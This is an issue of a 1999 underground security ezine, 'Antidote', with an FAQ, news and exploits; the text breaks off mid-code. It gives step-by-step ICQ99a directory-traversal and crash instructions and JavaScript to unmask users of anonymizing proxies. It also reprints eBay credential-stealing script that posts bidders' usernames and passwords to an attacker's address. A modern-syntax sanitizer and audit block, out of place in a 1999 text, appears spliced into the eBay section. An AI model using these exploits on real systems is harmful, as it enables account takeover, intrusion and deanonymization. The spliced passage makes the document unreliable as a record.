Antidote Volume: 2 Issue: 1 (May 99)

------------------------------

Well, here is another ezine put out by Antidote. This is our 5th issue that has come out. We have over 300 subscribers so far and we hope to get more. Please keep in mind that this is an educational ezine, in which we are not responsible for any information on here that you might use in the wrong and improper way. Also, please keep in mind that just because we 'print' this information, it doesn't mean that we made the thing or the exploit up. Most everything in this magazine is made by someone else and is received second hand (sent to us), and is then printed/posted on here by us.

------------------------------

--=\\Contents\\=--

0.00 - Beginning
    0.01 - What?
    0.02 - Complaints
    0.03 - Sending Articles
    0.04 - FAQ
1.00 - News & Exploits
    1.01 - Anonymous Surfing
    1.02 - ICQ99a Security Glitches
    1.03 - Intruder Alert '99
    1.04 - eBayla Bug
    1.05 - Cold Fusion Vulnerability
2.00 - Misc.
    2.01 - Configuring HardDrives
    2.02 - Basic UNIX Commands
    2.03 - PBBSER's code column

------------------------------

--=\\0.00\\=--
--------------

0.01 --=\\What?\\=--

What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world.
We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on their hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc, then you might want to go to your local bookstore and see if they carry '2600'.

------------------------------

0.02 --=\\Complaints\\=--

Our last issue we got a lot of complaints about the content. Well, this is not our fault now is it? It might be in some ways, but you all have to submit things to us so we can post them in here and have better content and articles etc... For submitting and rules, please see 0.03 (Sending Articles).

------------------------------

0.03 --=\\Sending Articles\\=--

As many of you know, we are always open to articles/submittings. We will take almost anything that has to do with computer security. This leaves you open for:

-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....

The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please note that if we receive two e-mails with the same topic/idea then we will use the one that we received first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic so that way you don't waste your time on writing something that won't be published. An example of this would be: If Joe sends me an e-mail with the topic being on hacking hotmail accounts on Thursday.
And then Bill sends us an e-mail on hacking hotmail accounts on Sunday, we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and we will review the article and put it in Antidote (if we like it).

------------------------------

0.04 --=\\FAQ\\=--

Here are a lot of questions that we seem to receive a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions and if the question isn't on here or doesn't make sense, then you can e-mail us with your question.

> What exactly is "Antidote"?

See section 0.01 for a complete description.

> I find Antidote to not be shot for the beginner or does not teach you the basics, why is that?

Antidote is for everyone, all we are basically is a news ezine that comes out once a month with the current news, exploits, flaws and even programming. All of the articles that are in here are received second hand (sent to us) and we very rarely edit anyone's articles.

> I just found Antidote issues on your webpage, is there anyway I can get them sent to me through e-mail?

Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will receive Antidote the second we release it and it will be sent as an attachment.

> If I want to submit something, are there any 'rules'?

Please see section 0.03 for a complete description.

> If I submitted something, can I remain anonymous?

Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say.

> I submitted something and I didn't see it in the current/last issue, why is that?

It could be that someone else wrote something similar to what you wrote and they sent it to us first.
If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues of Antidote.

> Can I submit something that I didn't "discover" or "write"?

Yes you can, we take information that is written by anyone regardless if you wrote it or not.

Well, that's it for our FAQ. If you have a question that is not on here or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month.

------------------------------

--=\\1.00\\=--
--------------

1.01 --=\\Anonymous Surfing\\=--

A couple of weeks ago there was a message posted on alt.comp.virus claiming that the "anonymous" web surfing programs are insecure and are easily bypassed with various JavaScript writings. One of the flaws just refreshes the current page, 'killing' the proxy on your side and thus revealing your true IP address. The other one just 'pulls' your true IP address, but doesn't work in IE4. These flaws have been found in the following Anonymous Surfing Providers:

Anonymizer (http://www.anonymizer.com)
Bell Labs (http://www.bell-labs.com/project/lpwa)
Naval Research Laboratory (http://www.onion-router.net)
Aixs (http://aixs.net/aixs/)

Here is the coding for 'pulling' the true IP address from the 'victim's' computer, though it doesn't work with IE. This script can be viewed at:

http://www.tiac.net/users/smiths/js/livecon/index.htm

with which we claim/have no affiliation.
Here is the JavaScript, put this in the 'body' of your webpage to take off anonymous surfing:

<script src=http://www.tiac.net/users/smiths/utils/common.js></script>
<script>JSDirectoryLine("LiveConnect and Java objects");</script>
<table border=1>
<tr><th align=center> Expression </th><th align=center> Result </th>
<th align=center> Comments </th></tr>
<script>
evalTableEntry_IENA('mydate = new java.util.Date()',
    "Make a Java <i>Date</i> object");
evalTableEntry_IENA('typeof(mydate)',
    "The type of a Java object is <i>object</i>");
evalTableEntry_IENA('mydate.toString()',
    "Convert the <i>Date</i> to a string");
evalTableEntry_IENA('typeof(mydate.toString())',
    "Oops, it's <b>not</b> a JavaScript string");
evalTableEntry_IENA('mydate + ""',
    "Here is another approach to do a string conversion");
evalTableEntry_IENA('typeof(mydate + "")',
    "This time we get a JavaScript string");
evalTableEntry_IENA('mydate.getMonth()',
    "Get the month field of the <i>Date</i> object");
evalTableEntry_IENA('typeof(mydate.getMonth())',
    "The getMonth() method returns a number as it should");
evalTableEntry_IENA('java.net.InetAddress.getLocalHost().getHostAddress()',
    "Get the IP address of the local machine");
evalTableEntry_IENA('java.net.InetAddress.getLocalHost().getHostName()',
    "Get the local machine name");
</script>
</table>

-Lord Oak (submitted by)
lordoak@thepoison.org

------------------------------

1.02 --=\\ICQ99a Security Glitches\\=--

As most people know, ICQ99a comes with an HTTPD which has been found to be insecure. It has a lot of vulnerabilities, one of which allows you to access someone's computer (remotely) and another of which will crash their ICQ99a. These vulnerabilities only work on versions 1700 or lower. How do you know if someone is running ICQ99a's HTTPD server? Well, when the user is online, look to the right of their nick-name, and if there is a little house next to it, then they are running it.
Here is how they work:

The first one allows you to get into someone's computer (remotely). This enables you to make any edits to their system you want. All you have to do is get the victim's IP number. You can do this by clicking on their nick-name and then going to "info". If they have it hidden, then you can go to:

http://members.icq.com/number

and then put your mouse over one of the links on their page and see where it is linking to. It should be something like:

http://24.93.212.1/page.html

Not necessarily that number, but any number. Now copy their IP address (from the link) and then all you have to do is go 'up' a couple of directories, which allows you to access their computer. The only thing is that they only allow .html files to be retrieved by your web browser. So, all you have to do is add a /.html/ to the URL and it will think that you are trying to process a .html file and it will let you view the directory. The URL should look something like this:

http://127.0.0.1/.html/../../../../../../config.sys

You can add as many /../ files as you want to, it will just take you 'up' one more directory.

The second one allows you to crash the user's ICQ99a. This one is easier than the other one. All you have to do is get the user's IP address (see the first one on how to get it) and then telnet to their IP and Port Number '80'. It won't say anything after you are connected. After you are connected, just type in an "Unknown String" or just a command that doesn't exist (ex: dfsdfh).

-Lord Oak (submitted by)
lordoak@thepoison.org

------------------------------

1.03 --=\\Intruder Alert '99\\=--

[copied from www.bonzi.com/intruderalert/ia99.htm]

Intruder ALERT '99 is a one of a kind Internet utility that can now notify you if someone is trying to break in to your computer, stop them dead in their tracks, and even build a visual map showing you the Intruder's ISP (Internet Service Provider) allowing you to visually see where the Intruder is located and report them!
You can now browse the Internet with the comfort and security of knowing that no one from the Internet can access your computer without your knowledge or permission! Every time you browse the Internet, send e-mail, or submit any private information to a web site, you broadcast your computer's unique IP Address over the Internet. With this IP address, someone can immediately begin trying to break into your computer without you even knowing it! Until now, there has been no way of telling if this has happened or any way of stopping it! Well not anymore!

Intruder ALERT Attack Log:

IntruderALERT '99 is more than just protection against Internet Intruder's, it allows you to track down your Intruder's ISP (Internet Service Provider) contact information and report the attack. This allows you to contact the Intruder's ISP and make them aware that someone on their network has tried to attack your computer. In most cases, they have the power to find out who the Intruder is and prevent any future attacks. With the IntruderALERT '99 built in 'Attack Log', you can know the date, time, IP Address, and Port Number used by the Intruder in the attack.

Mapping of the Intruder's ISP Location:

Intruder ALERT '99 can actually track down and give you a visual map of your Intruder's ISP location, allowing you to see where your attacker came from! This allows you to see where in the world your attacker is located. NOTE: This is a map of the ISP (Internet Service Provider) that the attacker is using to get their Internet access.

Built In Port Management:

Intruder ALERT has a built in "Port Manager" allowing you an extra level of security. You can customize the ports that Intruder ALERT will monitor to catch Intruders trying to break into your computer. This is very handy when you suspect someone is trying to hurt you.

The Easiest Way to Protect Your PC from Intruders!

IntruderALERT '99 is easy-to-use! Once installed, you can go about your work without a worry.
It runs silently in the background protecting you. Every time you turn on your computer, IntruderALERT '99 starts working automatically, only leaping into action when suspicious connection attempts are made to your computer.

Windows Sources Magazine:

The feature article in the November, 1997 issue of Windows Sources Magazine titled How to Practice Safe Browsing reports the following:

"Behind these headlines lie two fundamental concerns: fear that your browser will let a malicious or ill-behaved program corrupt data on your PC and fear that a loophole in your browser will give hackers access to your Web session so they can steal personal information while you're online. Both Microsoft and Netscape have gone to great pains to make you feel secure using their browsers, stressing the extremely small chance you'll fall prey to hackers. But neither company can anticipate every problem, so don't expect the headlines to stop anytime soon."

http://www.bonzi.com/intruderalert/ia99.htm

------------------------------

1.04 --=\\eBayla Bug\\=--

[copied from www.because-we-can.com]
[additions by Lord Oak]

This page describes a security problem that Blue Adept discovered with eBay's on-line auctions on March 31, 1999 (realaudio interview). The security hole allows eBay users to easily steal the passwords of other eBay users. The exploit involves posting items for bid that include malicious javascript code as part of the item's description. When an unsuspecting eBay user places a bid on the item, the embedded javascript code sends their username and password to the malicious user by e-mail. From the victim's point of view, nothing unusual seems to have occurred, so they are unlikely to report/complain to eBay.
Once a malicious user knows the username/password of the victim's eBay account, she can assume full control of the account, including the ability to:

-create new auctions (automatically charging the victim's account),
-place bids in the victim's name,
-retract legitimate bids in the victim's name,
-change the victim's username/password, barring them from eBay,
-associate bogus negative/positive comments with an arbitrary seller,
-prematurely close an auction being run by the victim,
-insert the ebayla code into the victim's auction.
-(The code could be altered to do this automatically, which would constitute an ebayla virus).

The security problem is dangerously easy to take advantage of. A malicious user needs only to embed the javascript code into their description of an item for auction. A walk-through of the exploit demonstrates step-by-step how any user can steal eBay passwords.

Blue Adept notified eBay that a 'huge' potential security problem existed on March 31, 1999 and offered assistance (but as of April 18, 1999 has only received form letter KMM798062C0KM in reply). Information about the ebayla exploit is being made publicly available to speed the process of fixing the security hole.
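
The hole described above exists because script placed in an item description runs in the bidder's browser as part of the auction page. As an added example (not from the original article, Blue Adept or eBay; the function names, audit rules and sample listings are constructed), this JavaScript shows a raw rendering beside an output-encoded one, plus an audit pass for descriptions that are already stored:

```javascript
// Added example: function names, rules and sample listings are constructed.

// Encode the characters that let text break out of HTML text or attribute context.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Behaviour the article describes: the seller's description reaches bidders verbatim.
function renderListingUnsafe(title, description) {
  return '<h1>' + title + '</h1><div class="desc">' + description + '</div>';
}

// Hardened form: every seller-controlled field is encoded on output.
function renderListingSafe(title, description) {
  return '<h1>' + escapeHtml(title) + '</h1><div class="desc">' +
    escapeHtml(description) + '</div>';
}

// Audit rules for stored descriptions: constructs that run code or post data.
const ACTIVE_CONTENT_RULES = [
  ['script-tag', /<\s*script\b/i],
  ['event-handler', /<[^>]*\son\w+\s*=/i],
  ['frame', /<\s*(frameset|frame|iframe)\b/i],
  ['form', /<\s*form\b/i],
  ['javascript-url', /javascript\s*:/i],
];

// Return the names of every rule that matches the description.
function findActiveContent(description) {
  return ACTIVE_CONTENT_RULES
    .filter(([, pattern]) => pattern.test(description))
    .map(([name]) => name);
}

// Constructed sample listings (the hostile one carries no working payload).
const SAMPLE_BENIGN = 'Rare 1921 coin, <b>mint</b> condition. Ships in 2 days.';
const SAMPLE_HOSTILE = 'Rare coin!<ScRiPt>var constructed = 1;</script>' +
  '<body onLoad=document.form1.submit()><form name=form1 method=POST action=/placeholder>';

// Audit a batch of descriptions and report which ones need review.
function auditListings(listings) {
  return listings.map((text) => {
    const findings = findActiveContent(text);
    return { flagged: findings.length > 0, findings };
  });
}

console.log(renderListingSafe('Coin', SAMPLE_HOSTILE));
console.log(auditListings([SAMPLE_BENIGN, SAMPLE_HOSTILE]));
```

Encoding removes all seller markup, so a site that wants to keep bold text or images needs an allow-list sanitizer instead. The audit patterns are a triage aid for finding affected listings, not a filter to rely on.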
Here is the current JavaScript code which is used to steal the user's/bidder's Username and Password:

<script>
recipient = "blue_adept@because-we-can.com";

function printframeset(place_bid, mailUrl, username, password){
  document.open();
  document.writeln('<script>');
  document.writeln('function go(){');
  document.writeln('top.b.document.open();');
  document.writeln('top.b.document.writeln("<body onLoad=document.form1.submit()>");');
  document.writeln('top.b.document.writeln("<form name=form1 method=POST action=' + mailUrl + '>");');
  document.writeln('top.b.document.writeln("<input type=hidden name=username value=' + username + '>");');
  document.writeln('top.b.document.writeln("<input type=hidden name=password value=' + password + '>");');
  document.writeln('top.b.document.writeln("</form>")');
  document.writeln('top.b.document.close();');
  document.writeln('}');
  document.writeln('</scr' + 'ipt>');
  document.writeln('</head>');
  document.writeln('<frameset rows="100%,*" onLoad="go()">');
  document.writeln('<frame name="t" src="' + place_bid + '">');
  document.writeln('<frame name="b" src="">');
  document.writeln('</frameset>');
  document.close();
}

function urlEncode(inStr) {
  outStr=' '; //not '' for a NS bug!
  for (i=0; i < inStr.length; i++) {
    aChar=inStr.substring (i, i+1);
    switch(aChar){
      case '%': outStr += "%25"; break;
      case ',': outStr += "%2C"; break;
      case '/': outStr += "%2F"; break;
      case ':': outStr += "%3A"; break;
      case '~': outStr += "%7E"; break;
      case '!': outStr += "%21"; break;
      case '"': outStr += "%22"; break;
      case '#': outStr += "%23"; break;
      case '